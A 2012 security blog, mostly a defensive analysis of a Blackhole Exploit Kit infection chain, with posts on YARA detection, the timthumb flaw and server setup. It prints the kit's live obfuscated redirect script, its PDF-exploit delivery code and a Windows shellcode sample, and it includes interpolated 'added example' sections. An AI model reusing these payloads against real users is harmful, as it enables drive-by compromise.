Friday, September 28, 2012

An Evening with Blackhole Exploit Kit v2.0 II

Continuing from the previous post, I've managed to get another link to a Blackhole exploit page that redirects the user to load a PDF exploit, and getting that PDF exploit sample really made my day (even though it is early in the morning).

The URL doesn't really present the standard Blackhole URL parameters, as its extension is .htm, but I've been informed by the source that it is flagged as JS/Blacole, so why not give it a try.

GET /osc.htm HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: college.unibel.by
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Date: Thu, 27 Sep 2012 22:01:40 GMT
Server: Apache/2.2.22 (Win32)
Last-Modified: Thu, 27 Sep 2012 22:00:59 GMT
ETag: "1300000001fa44-3d9-4cab613107f95"
Accept-Ranges:  none
Content-Length: 985
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html

2012-09-27 22:05:48 URL:hxxp://college.unibel.by/osc.htm [985/985] -> "osc.htm"

The content of osc.htm is shown below.

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
 </head>
 <body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>

<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{fbwenrn&&325}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="134&&114&&130&&66&&77&&69&&73&&76&&26&&135&&113&&131&&66&&78&&134&&114&&130&&66&&75&&27&&121&&119&&56&&135&&113&&131&&65&&78&&77&&135&&113&&131&&66&&58&&48&&140&&116&&128&&115&&134&&125&&118&&126&&133&&62&&125&&127&&116&&113&&133&&121&&128&&126&&78&&50&&121&&132&&133&&128&&75&&63&&64&&131&&118&&115&&133&&113&&127&&132&&118&&131&&62&&136&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&50&&76&&141".split("&&");h=2;s="";if(m)for(i=0;i-107!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

 </body>
</html>

It is the usual Blackhole obfuscation pattern: the script redirects the user to another page containing the exploit. By deobfuscating the JavaScript, I managed to get the redirection URL and consequently the content of that URL.

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://sectantes-x.ru:8080/forum/links/column.php";}
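As an added example (not part of the original post), the decoding loop of the osc.htm script can be reproduced statically, so the redirect target is recovered without ever executing the landing page's JavaScript. The number array and the "subtract 16 + (i % 2)" step are taken from the captured script above; the helper names decodeBlackholeRedirect, extractRedirectTarget and defang are my own.

```javascript
// Added example, not code from the original post or the kit: a static decoder
// for the osc.htm redirect script. Nothing from the landing page is eval()'d.

// The "&&"-joined array exactly as it appears in the captured osc.htm above.
const CAPTURED_N = "134&&114&&130&&66&&77&&69&&73&&76&&26&&135&&113&&131&&66&&78&&134&&114&&130&&66&&75&&27&&121&&119&&56&&135&&113&&131&&65&&78&&77&&135&&113&&131&&66&&58&&48&&140&&116&&128&&115&&134&&125&&118&&126&&133&&62&&125&&127&&116&&113&&133&&121&&128&&126&&78&&50&&121&&132&&133&&128&&75&&63&&64&&131&&118&&115&&133&&113&&127&&132&&118&&131&&62&&136&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&50&&76&&141";

// The kit's loop is: s += String.fromCharCode(n[i] - (020 + i % h)) with h = 2,
// and 020 is an octal literal, i.e. 16. Even indices subtract 16, odd ones 17.
function decodeBlackholeRedirect(joined) {
  const n = joined.split("&&");
  let s = "";
  for (let i = 0; i < n.length; i++) {
    s += String.fromCharCode(parseInt(n[i], 10) - (16 + (i % 2)));
  }
  return s;
}

// Pull the document.location assignment target out of the decoded script text.
// Returns null when no such assignment is present.
function extractRedirectTarget(decoded) {
  const m = decoded.match(/document\.location\s*=\s*["']([^"']+)["']/);
  return m ? m[1] : null;
}

// Defang a URL for reports: http -> hxxp and dots in the host bracketed.
function defang(url) {
  const u = new URL(url);
  return "hxxp://" + u.host.replace(/\./g, "[.]") + u.pathname + u.search;
}

const decoded = decodeBlackholeRedirect(CAPTURED_N);
console.log(decoded);
console.log("redirect target:", defang(extractRedirectTarget(decoded)));
```

Running this prints the three-line snippet shown above and the defanged redirect target. The same loop works on other Blackhole landing pages of this family as long as the offset (here 16) and the modulus (here 2) are read off the captured script first; they vary between samples.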

GET /forum/links/column.php HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: sectantes-x.ru:8080
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 27 Sep 2012 22:09:56 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12306

2012-09-27 22:12:02 URL:hxxp://sectantes-x.ru:8080/forum/links/column.php [12306/12306] -> "column.php" [1]

The content of column.php is not human-readable as delivered, since it was gzip-compressed. With a little help from PHP's gzinflate(), I managed to get it uncompressed. Tested against my previous YARA rule, it matched the signature for a Blackhole exploit page :)

[[email protected] analysis]# yara -r ../Blackhole_Exploit_Page.yar column.php
Blackhole2_exploit_page column.php

After the deobfuscation process, I got the PluginDetect page that checks whether the user's version of Adobe Reader is vulnerable. You may find the beautified version of the deobfuscated code HERE.

Unlike other PluginDetect pages that I've seen, which scan the versions of Adobe Reader, Flash, Java, etc., this version of the PluginDetect page looks only for the Adobe Reader version in order to serve the PDF exploit.

I'm quite interested in how Blackhole serves the PDF exploit to the user after detecting the Adobe Reader version. In the beautified code linked above, Blackhole uses the function x() to craft the URL parameter values that redirect the user to download the PDF exploit.

function x(s) {
    d = [];
    for (i = 0; i < s.length; i++) {
        k = (s.charCodeAt(i) - 46).toString(16);
        if (k.length == 1) k = "0" + k;
        d.push(k);
    };
    return d.join("");
}

show_pdf2 = function (src) {
    var p = document.createElement('object');
    p.setAttribute('type', 'application/pdf');
    p.setAttribute('data', src);
    p.setAttribute('width', 1);
    p.setAttribute('height', 1);
    document.body.appendChild(p)
};
show_pdf2(window.location + "?cpdgszkh=" + x("89719") + "&uln=" + x("r") + "&rfor=3307093738070736060b&wjlajcro=" + x(pdfver.join(".")));

Using the function x(), I managed to get the full path to download the PDF exploit sample, which is packaged with the libtiff exploit.

column.php?cpdgszkh=0a0b09030b&uln=44&rfor=3307093738070736060b&wjlajcro=0b00040003
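Since x() is only a fixed offset and a hex expansion, it is trivially invertible, which is useful on the defence side when such a request turns up in a proxy log and you want to know what the landing page had detected. The following is an added example, not code from the post or the kit: x() is re-implemented only for round-trip checking, and unx() and decodeLandingQuery() are my own names. The sample query string is the one captured above.

```javascript
// Added example, not from the original post: decoding the x()-encoded
// parameters of a captured column.php request back into plain text.

// Re-implementation of the kit's encoder: two hex digits per character,
// each equal to (charCode - 46). Used here only to check the round trip.
function x(s) {
  const d = [];
  for (let i = 0; i < s.length; i++) {
    let k = (s.charCodeAt(i) - 46).toString(16);
    if (k.length === 1) k = "0" + k;
    d.push(k);
  }
  return d.join("");
}

// Inverse of x(): consume two hex digits at a time and add 46 back.
// Returns null for input that cannot be x() output (odd length or non-hex).
function unx(hex) {
  if (hex.length % 2 !== 0 || !/^[0-9a-f]*$/i.test(hex)) return null;
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) + 46);
  }
  return out;
}

// Decode every parameter of a captured landing-page URL. A value that does
// not decode to printable ASCII is reported unchanged so nothing is hidden.
function decodeLandingQuery(urlOrQuery) {
  const query = urlOrQuery.includes("?") ? urlOrQuery.split("?")[1] : urlOrQuery;
  const result = {};
  for (const [name, value] of new URLSearchParams(query)) {
    const plain = unx(value);
    result[name] = plain !== null && /^[\x20-\x7e]*$/.test(plain) ? plain : value;
  }
  return result;
}

// The request captured above (constructed from the post's own URL).
const CAPTURED_REQUEST =
  "column.php?cpdgszkh=0a0b09030b&uln=44&rfor=3307093738070736060b&wjlajcro=0b00040003";
console.log(decodeLandingQuery(CAPTURED_REQUEST));
```

On the captured request this gives cpdgszkh = "89719", uln = "r" and wjlajcro = "9.2.1", so the victim browser had reported Adobe Reader 9.2.1 to PluginDetect. The rfor value also decodes cleanly with the same offset, to a 10-character hex-looking token; the post does not say what it carries.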

When I finished downloading the PDF sample, I was wondering whether Blackhole uses the parameter values to protect the sample from being easily obtained by security researchers, so I played around with the parameter values: (1) with a different value of pdfver.join(".") for wjlajcro, and (2) with arbitrary characters not matching the output of function x(). All I got was the same sample that leads to the libtiff exploit. Then I wondered again what the purpose of encoding the path with x() is, and I have no idea.

For the PDF exploit analysis, I'll be back on the next post. Until next time, bye bye.

Thursday, September 27, 2012

An Evening with Blackhole Exploit Kit v2.0


After coming back from martial arts class last night, I happened to have some time to dig around an in-the-wild Blackhole Exploit Kit (BHEK) v2.0 exploit page. Unfortunately, I didn't manage to get the exploit samples, since the site hosting the BHEK went down right after I deobfuscated the JavaScript of the exploit page.

With a limited number of exploit page samples (since the uptime of a BHEK exploit page is short, maybe a hit-and-run method), I wrote YARA rules to exercise the patterns and the generalization across different samples.

rule Blackhole2_exploit_page
{
        meta:
                author = "Ahmad Azizan"
                ref = "BlackHole 2.0"
                description = "BlackHole Exploit Page"
                version = "0.1"
                impact = 4
                hide = false

        strings:
                $eval1 = /window\[['"](['"]\+['"]){0,1}e(['"]\+['"]){0,1}v(['"]\+['"]){0,1}a(['"]\+['"]){0,1}l(['"]\+['"]){0,1}['"]\]/ nocase
                $eval2 = /eval\(.{1,}\);/ nocase

                $pattern1 = /getElementsByTagName/ nocase
                $pattern2 = /getElementById/ nocase
                $pattern3 = /getAttribute/ nocase

                $fcc1 = /(String.){0,1}fromCharCode/ nocase
                $fcc2 = /fromCha/ nocase
                $fcc3 = /rCode/ nocase

                $doc = /document\[\w{1,}\]\(['"].{1,}['"]\);/ nocase

                $try = /try\s{0,}\{.{1,}\}\s{0,}catch\s{0,}\(.{1,}\)\s{0,}\{/ nocase

                $machine1 = /Win/
                $machine2 = /Mac/
                $machine3 = /Linux/
                $machine4 = /FreeBSD/
                $machine5 = /iPhone/
                $machine6 = /iPod/
                $machine7 = /iPad/
                $machine8 = /Win\.\*CE/
                $machine9 = /Win\.\*Mobile/
                $machine10 = /Pocket\\\\s\*PC/

                $api1 = /Msxml2.XMLHTTP/
                $api2 = /Msxml2.DOMDocument/
                $api3 = /Microsoft.XMLDOM/
                $api4 = /ShockwaveFlash.ShockwaveFlash/
                $api5 = /TDCCtl.TDCCtl/
                $api6 = /Shell.UIHelper/
                $api7 = /Scripting.Dictionary/
                $api8 = /wmplayer.ocx/

                $plugin1 = /PluginDetect\.getVersion\(.{1,}\);/ nocase

                $type1 = /function\s{0,}x\(s\)\{d\=\[\];for\(\w{1}\=0;\w{1}<s\.length;\w{1}\+\+\)\{k\=\(s\.charCodeAt\(\w{1}\)\-\d{2}\)\.toString\(\d{2}\);if\(k\.length\=\=\d{1}\)k\=\"\d{1}\"\+k;d\.push\(k\);\};return d\.join\(\"\"\);\}/ nocase

                $type2_1 = /clsid:8AD9C840-044E-11D1-B3E9-00805F499D93/
                $type2_2 = /clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA/
                $type2_3 = /clsid:CA8A9780-280D-11CF-A24D-444553540000/
                $type2_4 = /clsid:D27CDB6E-AE6D-11CF-96B8-444553540000/
                $type2_5 = /clsid:BD96C556-65A3-11D0-983A-00C04FC29E36/
                $type2_6 = /%u[0-9a-fA-F]{4}/

        condition:

                ((($eval1 or $eval2) and (($pattern1 or $pattern2) and $pattern3) and ($fcc1 or ($fcc2 and $fcc3)) and ($doc) and ($try)) or
                (($eval1 or $eval2) and (($pattern1 or $pattern2) and $pattern3) and ($doc) and ($try)) or
                (($eval1 or $eval2) and ($fcc1 or ($fcc2 and $fcc3)) and ($try)) or
                (($eval1 or $eval2) and ($doc) and ($try)) or
                (($eval1 or $eval2) and ($try))) or
                ((all of ($machine*)) and
                (all of ($api*)) and
                ($plugin1) and
                (($type1) or (all of ($type2_*))))
}

And here are the test results:

[[email protected] analysis]# yara -r ../Blackhole_Exploit_Page.yar .
Blackhole2_exploit_page ./speedmudi-obf.orig
Blackhole2_exploit_page ./afternewvision-obf.orig
Blackhole2_exploit_page ./afternewvision-deobf.orig
Blackhole2_exploit_page ./thats_fitted-obf.orig
Blackhole2_exploit_page ./thats_fitted-deobf.orig
Blackhole2_exploit_page ./degree_deleting-obf.orig
Blackhole2_exploit_page ./degree_deleting-deobf.orig
Blackhole2_exploit_page ./mydb-obf.orig
Blackhole2_exploit_page ./mydb-deobf.orig

Monday, September 24, 2012

Timthumbs up!



Buying a ready-made WordPress theme couldn't be easier nowadays. For us, buying a ready-made WordPress theme means saving ourselves from the pain-in-the-butt task of designing a WordPress theme from scratch.

However, some of the time, we might be a little unaware of the list of plugins bundled with the theme. Even when it is mentioned by the theme sellers (and most of the time it is not), we care less about the version, as we might see the plugins as just a small component of a big functional WordPress framework.

One obvious example is timthumb.php, a widely used script in WordPress themes for cropping, zooming and resizing web images. Since August 2011, timthumb has been known to contribute to a disastrous number of compromised websites. The number is still increasing, along with the not-yet-patched timthumb copies inside WordPress themes not yet bought by unaware users.

In its earlier versions (1.* - 1.32), timthumb is prone to a remote code execution vulnerability, because the script does not check remotely cached files properly. By crafting a special image file with a valid MIME type and appending a PHP file at the end of it, it is possible to fool timthumb into believing that it is a legitimate image, thus caching it locally in the cache directory [1].

Based on code revision r141, we can see on line 668 that the $allowedSites array is not checked properly: the strpos() match lets an attacker craft a hostname such as http://blogger.com.lab69.com/pocfile.php to make timthumb think it is one of the allowed sites to include in the content. In code revision r143, a simple patch appending '/' to each allowed site fixes the problem.
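To make the difference between the two revisions concrete, here is an added example (written in JavaScript, not timthumb's PHP, and not timthumb's own code) that models the allowed-site check three ways: the plain substring match, the same match with a trailing '/', and a stricter host comparison that I would recommend for any remote-fetch allow-list. The allow-list is constructed for the example (only blogger.com comes from the post), and the bypass hostname is the one quoted above. The function names are my own.

```javascript
// Added example, not timthumb's code: modelling the allowed-site check.

// Constructed allow-list; "blogger.com" is the entry used in the post's
// bypass example, the others are placeholders for the sake of the demo.
const ALLOWED_SITES = ["blogger.com", "flickr.example", "img.youtube.example"];

// r141-style check as described in the post: a plain substring match
// (PHP strpos() !== false) on the lowercased URL. Any URL that merely
// contains an allowed name anywhere passes.
function isAllowedSubstring(src, allowed) {
  const s = src.toLowerCase();
  return allowed.some(site => s.indexOf(site) !== -1);
}

// r143-style check as described in the post: the same substring match, but
// each allowed name carries a trailing "/", so "blogger.com.lab69.com/"
// no longer contains "blogger.com/".
function isAllowedSubstringSlash(src, allowed) {
  return isAllowedSubstring(src, allowed.map(site => site + "/"));
}

// Stricter form (my recommendation, not a timthumb revision): parse the URL,
// restrict the scheme, and compare the hostname itself against the list,
// exactly or as a subdomain. An allowed name appearing in the path, or a
// host that merely starts with an allowed name, does not pass.
function isAllowedHost(src, allowed) {
  let u;
  try { u = new URL(src); } catch (e) { return false; }   // unparsable -> deny
  if (u.protocol !== "http:" && u.protocol !== "https:") return false;
  const host = u.hostname.toLowerCase();
  return allowed.some(site => host === site || host.endsWith("." + site));
}

// The bypass URL from the post, and a genuine allowed-site URL for contrast.
const BYPASS = "http://blogger.com.lab69.com/pocfile.php";
const GENUINE = "http://blogger.com/some/image.jpg";

for (const url of [BYPASS, GENUINE]) {
  console.log(url,
    "substring:", isAllowedSubstring(url, ALLOWED_SITES),
    "substring+slash:", isAllowedSubstringSlash(url, ALLOWED_SITES),
    "host:", isAllowedHost(url, ALLOWED_SITES));
}
```

The substring check accepts the blogger.com.lab69.com URL, the '/'-suffixed check rejects it, and the host check rejects it as well while still accepting the genuine blogger.com URL. Note that a substring check of the r143 shape, as modelled here, still matches the allowed name wherever it occurs in the URL, which is why comparing the parsed hostname is the more robust design.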

If you happened to buy an old WordPress theme (bundled with a vulnerable timthumb), it is good practice to update timthumb to the latest version from its repository. You can start by installing a WordPress plugin called Timthumb Vulnerability Scanner to scan for existing timthumb copies and their versions in your WordPress directory; it informs you whether they are out of date and require an update.


Credit:
http://www.exploit-db.com/exploits/17602/
http://timthumb.googlecode.com/svn/trunk/timthumb.php
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

Friday, September 21, 2012

Having fun with yara and ruby


YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. (Source: http://code.google.com/p/yara-project/)

Installation

Initiate the installation process by installing ruby, gems, and pcre
yum install ruby ruby-devel rubygems pcre pcre-devel

Download and install YARA
wget http://yara-project.googlecode.com/files/yara-1.6.tar.gz
tar -xvf yara-1.6.tar.gz
cd yara-1.6
./configure
make
sudo make install

Install yara-ruby
gem install yara

Note: If you get an error such as "yada yada libyara.so.0: cannot open shared object file: No such file or directory yada yada" when you try to run your yara ruby application, you should add the path /usr/local/lib to the loader configuration file. Note that sudo applies only to the command, not to a shell redirection, so append through tee:
echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
sudo ldconfig

Code

This is sample code from yara-ruby to test the PE rule.
#!/usr/bin/env ruby
#
# Usage example:
#   ruby ispe.rb /win_c/windows/system32/*.???
#
#    yara-ruby - Ruby bindings for the yara malware analysis library.
#    Eric Monti
#    Copyright (C) 2011 Trustwave Holdings
#
#    This program is free software: you can redistribute it and/or modify it
#    under the terms of the GNU General Public License as published by the
#    Free Software Foundation, either version 3 of the License, or (at your
#    option) any later version.
#
#    This program is distributed in the hope that it will be useful, but
#    WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
#    or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
#    for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program. If not, see <http://www.gnu.org/licenses/>.
#

$: << File.join(File.dirname(__FILE__), '..', 'lib')
require 'rubygems'
require 'yara'

ctx = Yara::Rules.new

ctx.compile_string "rule IsPE { condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 }"

ARGV.each do |fname|
  ctx.scan_file(fname).each {|match| puts ">> #{fname} matched #{match.rule} rule" }
end
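The IsPE rule above packs two checks into one line: the first word of the file must be "MZ", and the 32-bit value at offset 0x3C (the e_lfanew field of the DOS header) must point at the "PE\0\0" signature. The following is an added example, not part of yara-ruby or the post, that performs the same two reads by hand on a byte buffer so the indirection is visible, including the case where e_lfanew points outside the file. The function names isPE and makeSample are my own, and the sample buffers are constructed here rather than read from real files.

```javascript
// Added example, not from yara-ruby or the post: the IsPE rule's logic
//   uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550
// applied by hand to a Node.js Buffer.

function isPE(buf) {
  // The DOS header is 64 bytes; e_lfanew lives at 0x3C, so anything shorter
  // cannot satisfy the rule.
  if (buf.length < 0x40) return false;
  if (buf.readUInt16LE(0) !== 0x5a4d) return false;       // "MZ", little-endian
  const eLfanew = buf.readUInt32LE(0x3c);                  // offset of the PE header
  if (eLfanew + 4 > buf.length) return false;              // pointer outside the file
  return buf.readUInt32LE(eLfanew) === 0x00004550;         // "PE\0\0"
}

// Build a minimal constructed sample: optional "MZ" stub, e_lfanew at 0x3C,
// optional "PE\0\0" at the chosen offset, zero elsewhere.
function makeSample(peOffset, { mz = true, pe = true } = {}) {
  const buf = Buffer.alloc(Math.max(0x40, peOffset + 4), 0);
  if (mz) buf.write("MZ", 0, "ascii");
  buf.writeUInt32LE(peOffset, 0x3c);
  if (pe) buf.write("PE", peOffset, "ascii");              // trailing two bytes already 0
  return buf;
}

// Constructed test inputs covering the happy path and the ways the rule fails.
const SAMPLES = {
  pe: makeSample(0x80),                                    // MZ + valid pointer + PE
  mzOnly: makeSample(0x80, { pe: false }),                 // DOS stub without PE header
  peNoMz: makeSample(0x80, { mz: false }),                 // PE signature but no MZ
  badPointer: (() => {                                     // e_lfanew beyond the buffer
    const b = makeSample(0x80);
    b.writeUInt32LE(0xfffffff0, 0x3c);
    return b;
  })(),
  tooShort: Buffer.from("MZ", "ascii"),                    // no room for e_lfanew
};

for (const [name, buf] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(10), isPE(buf));
}
```

Only the first sample is reported as a PE file; the others show that the "MZ" check alone is not enough, that the PE signature must be reached through e_lfanew, and that an out-of-range pointer must be treated as no match rather than read blindly, which is what the rule does when uint32() cannot be evaluated.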

Shellcode

Below is the sample shellcode that we'll use to test the above PE rule. You can convert the shellcode to an exe at this website: http://sandsprite.com/shellcode_2_exe.php
%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9%uadf5%uff57%u53d6%u5353%u4353%u4353%uff53%u68d0%ubeca%u2455%u6866%u611e%u5366%ue189%u6895%uf9ec%u60aa%uff57%u6ad6%u5110%uff55%u66d0%u646a%u6866%u6d63%u506a%u2959%u89cc%u6ae7%u8944%u31e2%uf3c0%u95aa%ufd89%u42fe%ufe2d%u2c42%u7a8d%uab38%uabab%u7268%ub3fe%uff16%u2875%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce%ud6ff%uff6a%u37ff%ud0ff%ue768%uc679%uff79%u0475%ud6ff%u77ff%ufffc%u68d0%uceef%u60e0%uff53%uffd6%u41d0

Testing

With the code and shellcode above, we can test the IsPE rule as a proof of concept of how well YARA detects a file based on a given rule:
[[email protected] yara]# ruby test.rb shellcode.exe_
>> shellcode.exe_ matched IsPE rule
[[email protected] yara]#

Credit:
http://code.google.com/p/yara-project/
https://github.com/SpiderLabs/yara-ruby

Wednesday, September 19, 2012

Linode Speedtest in Malaysia


If you want to try an offshore VPS, Linode is one of the best values. With a great support team, a cool control panel and, not to mention, a hassle-free resizing process, Linode has made VPS renting as easy as ABC.

Linode currently has 6 datacenter locations: Tokyo, London, Newark, Atlanta, Dallas, and Fremont. To allow a speed test against each of their datacenters, Linode provides a speedtest page for customers to evaluate the speed themselves.

As for me, my main concern with an offshore datacenter is speed, because most of the time the clients are located in Malaysia and will have frequent contact with the host (VPS).

I know that location is the most important aspect for connection speed: the nearer we are to the datacenter, the faster the connection we'll get. But just to get some quantitative analysis (lol), I did a bit of speed evaluation for all the Linode datacenters:

--2012-09-20 05:08:16--  http://speedtest.tokyo.linode.com/100MB-tokyo.bin
Resolving speedtest.tokyo.linode.com... 106.187.96.148, 2400:8900::4b
Connecting to speedtest.tokyo.linode.com|106.187.96.148|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-tokyo.bin'

100%[=========================>] 104,857,600  855K/s   in 2m 30s

2012-09-20 05:10:47 (682 KB/s) - `100MB-tokyo.bin' saved [104857600/104857600]

--2012-09-20 05:14:34--  http://speedtest.london.linode.com/100MB-london.bin
Resolving speedtest.london.linode.com... 176.58.107.39, 2a01:7e00::4b
Connecting to speedtest.london.linode.com|176.58.107.39|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-london.bin'

100%[=========================>] 104,857,600  200K/s   in 2m 53s

2012-09-20 05:17:30 (590 KB/s) - `100MB-london.bin' saved [104857600/104857600]

--2012-09-20 05:27:31--  http://speedtest.newark.linode.com/100MB-newark.bin
Resolving speedtest.newark.linode.com... 50.116.57.237, 2600:3c03::4b
Connecting to speedtest.newark.linode.com|50.116.57.237|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-newark.bin'

100%[=========================>]104,857,600  943K/s   in 2m 23s

2012-09-20 05:29:55 (716 KB/s) - `100MB-newark.bin' saved [104857600/104857600]

--2012-09-20 05:33:56--  http://speedtest.atlanta.linode.com/100MB-atlanta.bin
Resolving speedtest.atlanta.linode.com... 50.116.39.117, 2600:3c02::4b
Connecting to speedtest.atlanta.linode.com|50.116.39.117|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-atlanta.bin'

100%[=========================>]104,857,600  924K/s   in 2m 53s

2012-09-20 05:36:50 (593 KB/s) - `100MB-atlanta.bin' saved [104857600/104857600]

--2012-09-20 05:37:00--  http://speedtest.dallas.linode.com/100MB-dallas.bin
Resolving speedtest.dallas.linode.com... 50.116.25.154, 2600:3c00::4b
Connecting to speedtest.dallas.linode.com|50.116.25.154|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-dallas.bin'

100%[=========================>]104,857,600  540K/s   in 3m 9s

2012-09-20 05:40:10 (541 KB/s) - `100MB-dallas.bin' saved [104857600/104857600]

--2012-09-20 05:11:00--  http://speedtest.fremont.linode.com/100MB-fremont.bin
Resolving speedtest.fremont.linode.com... 50.116.14.9, 2600:3c01::4b
Connecting to speedtest.fremont.linode.com|50.116.14.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100MB-fremont.bin'

100%[=========================>] 104,857,600  247K/s   in 3m 26s

2012-09-20 05:14:27 (498 KB/s) - `100MB-fremont.bin' saved [104857600/104857600]

It seems that the Newark datacenter is a bit faster than Tokyo, even though Tokyo is nearest to Malaysia. Since my current Linode VPS is located in the Tokyo datacenter, maybe I can give Newark a try. With the incredibly fast support from Linode, I don't think changing datacenter will be a nuclear-reactor-migration process.

For more information on changing between Linode datacenters, refer here.

Tuesday, September 18, 2012

VPN + iPhone

Using a VPN connection to access the Internet through your smartphone is a bit more secure than usual, especially on public wifi. It encapsulates the data transferred between your smartphone and the Internet so that other people on the LAN cannot intervene in the connection.

Other than getting secure connectivity, users tend to use a VPN to hide their original IP, to access blocked websites, and to bypass mobile data quota limits.

There are many different classifications, implementations, and uses of VPNs, but in this write-up, I'll explain a bit about how to set up PPTP with an iPhone on a CentOS server.

VPN Installation (CentOS)

Make sure pptpd and ppp are not installed (remove them if they are)
yum remove -y pptpd ppp

Flush all NAT POSTROUTING and FORWARD iptables rules
iptables --flush POSTROUTING --table nat
iptables --flush FORWARD

Delete existing pptpd.conf and ppp directory
rm -rf /etc/pptpd.conf
rm -rf /etc/ppp

Download the required packages to install PPTP
wget http://www.diahosting.com/dload/dkms-2.0.17.5-1.noarch.rpm
wget http://www.diahosting.com/dload/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
wget http://www.diahosting.com/dload/pptpd-1.3.4-1.rhel5.1.i386.rpm
wget http://www.diahosting.com/dload/ppp-2.4.4-9.0.rhel5.i386.rpm

Install packages and dependencies
yum -y install make libpcap iptables gcc-c++ logrotate tar cpio perl pam tcp_wrappers
rpm -ivh dkms-2.0.17.5-1.noarch.rpm
rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
rpm -qa kernel_ppp_mppe
rpm -Uvh ppp-2.4.4-9.0.rhel5.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm

Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

Configure pptpd.conf for local and remote ip
echo "localip 10.0.0.1" >> /etc/pptpd.conf
echo "remoteip 10.0.0.2-254" >> /etc/pptpd.conf

Configure options.pptpd for DNS server
echo "ms-dns 8.8.8.8" >> /etc/ppp/options.pptpd
echo "ms-dns 8.8.4.4" >> /etc/ppp/options.pptpd

Add a user for the VPN connection
echo "myvpnusername pptpd myvpnpassword *" >> /etc/ppp/chap-secrets

Allow IP Masquerading in iptables
iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j SNAT --to-source `ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk 'NR==1 {print $1}'`
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
service iptables save
service iptables restart

Turn on pptpd service on start-up
chkconfig pptpd on

Reboot the server. When the server is back online, you can create a VPN connection using the username and password you inserted in /etc/ppp/chap-secrets.

Connecting to VPN server via iPhone

Tap the Settings icon and tap on the VPN tab. If there is no VPN tab, scroll down a bit and tap on the General tab and then the Network tab.


On the VPN screen, tap on "Add VPN Configuration"


On the "Add Configuration" screen, tap on PPTP and insert your VPN settings.
Description: Your VPN description
Server: Your VPN IP or hostname
Account: Your VPN username
Password: Your VPN password
Send All Traffic: On


When done entering the VPN details, tap on "Save". Then tap "On" to connect to your VPN server.


Once your VPN connection has been established, you can see a small VPN icon at the top of your screen.


Credit: Rockia